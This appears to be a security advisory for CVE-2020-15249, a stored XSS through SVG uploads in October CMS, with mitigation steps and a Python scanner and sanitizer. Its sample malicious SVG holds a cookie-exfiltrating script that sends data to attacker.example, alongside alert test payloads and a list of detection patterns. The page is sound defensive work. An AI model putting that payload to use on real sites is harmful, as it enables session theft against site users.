Platform
php
Component
october/backend
Fixed in
1.0.320
1.0.469
CVE-2020-15249 describes a stored cross-site scripting (XSS) vulnerability in the October CMS backend file upload functionality. The backend accepted SVG files from authenticated backend users without sanitizing them, so an SVG carrying JavaScript (a `<script>` element, an event-handler attribute such as `onload`, or a `javascript:` link) was stored and later served unchanged. The vulnerability affects October CMS versions up to and including v1.0.468; a fix is available in version 1.0.469.
An attacker with backend upload permissions could upload a specially crafted SVG file containing JavaScript. The backend does not render uploaded SVGs inline, so the payload does not fire while browsing the media library; it executes only when a victim opens the file's URL directly as a document (e.g., /storage/app/media/evil.svg). Because the file is served from the site's own origin, the script then runs in that origin's context and can read the victim's cookies and session, perform backend actions as them, or deface the site. Note that an SVG referenced from an `<img>` tag does not run script; the victim has to be lured to the raw file URL, which is why exploitation cannot be triggered automatically by backend processes. Even with that limitation, the potential for session theft and privileged-user compromise makes this a concerning vulnerability, particularly where backend accounts hold sensitive data or elevated permissions.
This vulnerability was publicly disclosed on November 23, 2020. There is no indication of active exploitation campaigns targeting this specific CVE. No public proof-of-concept (PoC) code has been widely distributed, but the vulnerability is straightforward to exploit: the payload is an ordinary SVG file with script content, and the only prerequisites are a backend account with upload rights and a victim who visits the file URL. It is not currently listed in the CISA KEV catalog.
Exploit Status
EPSS
0.17% (38th percentile)
The primary mitigation for CVE-2020-15249 is to upgrade October CMS to version 1.0.469 or later, which sanitizes SVG files at upload time. If upgrading immediately is not feasible, reduce the impact at the web server: either deny direct requests for .svg files under /storage/app/media, or serve them with a `Content-Disposition: attachment` header so the browser downloads rather than renders them (an Apache .htaccess or Nginx `location` rule matching `\.svg$` under that path is enough). The upgrade sanitizes new uploads; nothing on the page suggests it rewrites files already in the media library, so review existing SVGs for script content, event-handler attributes and `javascript:` links and remove or re-upload anything suspicious. Keep strict validation and sanitization on all file uploads going forward. After upgrading, confirm the fix by uploading a test SVG containing a simple `<script>alert(1)</script>` or `onload="alert(1)"`, then opening the stored file's URL directly in the browser (not through the media library preview, which never executed the script) and verifying that the script element and attribute have been stripped and nothing executes.
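As an added example, not code from October CMS or from the advisory, the following Python script shows what the sanitization gap looks like in practice: a constructed malicious SVG of the kind described above, a scanner that flags the active content in it (useful for reviewing files already under storage/app/media before and after the upgrade), and a minimal sanitizer that strips that content so you can compare against what the patched upload path should produce. The path storage/app/media is taken from the page; the function names and the sample SVGs are this example's own. October's real fix is PHP and is not reproduced here.

```python
"""Added example for CVE-2020-15249: find and strip active content in SVG uploads.

Illustrative code written for this page, not October CMS's sanitizer.
Standard library only. The sample SVGs below are constructed for the demo.
"""
import os
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that execute script or embed arbitrary HTML inside an SVG document.
ACTIVE_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
# href / xlink:href schemes that execute instead of referencing a resource.
DANGEROUS_SCHEME = re.compile(r"^\s*(javascript|data|vbscript)\s*:", re.IGNORECASE)

# Constructed sample: what an attacker would upload (payload modelled on the page's description).
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100" onload="alert(document.cookie)">
  <rect width="100" height="100" fill="red"/>
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text y="50">click</text></a>
</svg>
"""
# Constructed sample: an ordinary, inert SVG.
CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="blue"/>
</svg>"""


def _local(tag: str) -> str:
    """Strip the namespace from an ElementTree name like '{ns}script'."""
    return tag.rsplit("}", 1)[-1]


def _dangerous_attrs(elem) -> list:
    """Event handlers (onload=, onclick=, ...) and executable href values."""
    hits = []
    for name, value in elem.attrib.items():
        local = _local(name)
        if local.lower().startswith("on"):
            hits.append(f"{_local(elem.tag)}@{local}")
        elif local == "href" and DANGEROUS_SCHEME.match(value):
            hits.append(f"{_local(elem.tag)}@{local}={value.strip()[:20]}")
    return hits


def find_active_content(svg: bytes) -> list:
    """Return findings for one SVG; an empty list means nothing executable was seen."""
    try:
        root = ET.fromstring(svg)
    except ET.ParseError as exc:
        return [f"unparseable: {exc}"]
    findings = []
    for elem in root.iter():
        if _local(elem.tag) in ACTIVE_TAGS:
            findings.append(f"element:{_local(elem.tag)}")
        findings.extend(_dangerous_attrs(elem))
    return findings


def sanitize_svg(svg: bytes) -> bytes:
    """Drop active elements and attributes, keeping the drawing itself."""
    root = ET.fromstring(svg)
    # ElementTree has no parent pointers, so remove children via each parent.
    for parent in list(root.iter()):
        for child in list(parent):
            if _local(child.tag) in ACTIVE_TAGS:
                parent.remove(child)
    for elem in root.iter():
        for name in list(elem.attrib):
            local = _local(name)
            if local.lower().startswith("on") or (
                local == "href" and DANGEROUS_SCHEME.match(elem.attrib[name])
            ):
                del elem.attrib[name]
    ET.register_namespace("", SVG_NS)
    ET.register_namespace("xlink", XLINK_NS)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


def scan_directory(path: str) -> dict:
    """Map every .svg under `path` (e.g. storage/app/media) to its findings."""
    report = {}
    for dirpath, _, files in os.walk(path):
        for name in files:
            if name.lower().endswith(".svg"):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    report[full] = find_active_content(fh.read())
    return report


if __name__ == "__main__":
    print("malicious:", find_active_content(MALICIOUS_SVG))
    print("clean:    ", find_active_content(CLEAN_SVG))
    print("sanitized:", find_active_content(sanitize_svg(MALICIOUS_SVG)))
```

Run `scan_directory("storage/app/media")` from the October install root to list existing uploads with findings; any file reported should be treated as the stored payload the page describes and removed. The scanner is deliberately conservative (it flags `data:` hrefs and `foreignObject` too), and the sanitizer is a demonstration of the strip-don't-trust approach rather than a complete SVG allowlist; for production use, an established allowlisting SVG sanitizer is the safer choice.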
Update October CMS to version 1.0.469 or later. This version fixes the stored XSS vulnerability by applying sanitization to uploaded SVG files. Alternatively, update to version 1.1.0.
CVE-2020-15249 is a stored cross-site scripting (XSS) vulnerability in the October CMS backend that lets authenticated backend users upload SVG files containing JavaScript, which runs when another user opens the file's URL directly.
You are affected if you are using October CMS versions 1.0.468 or earlier. Upgrade to 1.0.469 or later to resolve the issue.
Upgrade October CMS to version 1.0.469 or later. As a temporary workaround, restrict direct access to the /storage/app/media directory.
There is no current evidence of active exploitation, but the vulnerability is easy to exploit for anyone who already holds a backend account with upload rights.
Refer to the official October CMS security advisory: https://octobercms.com/support/security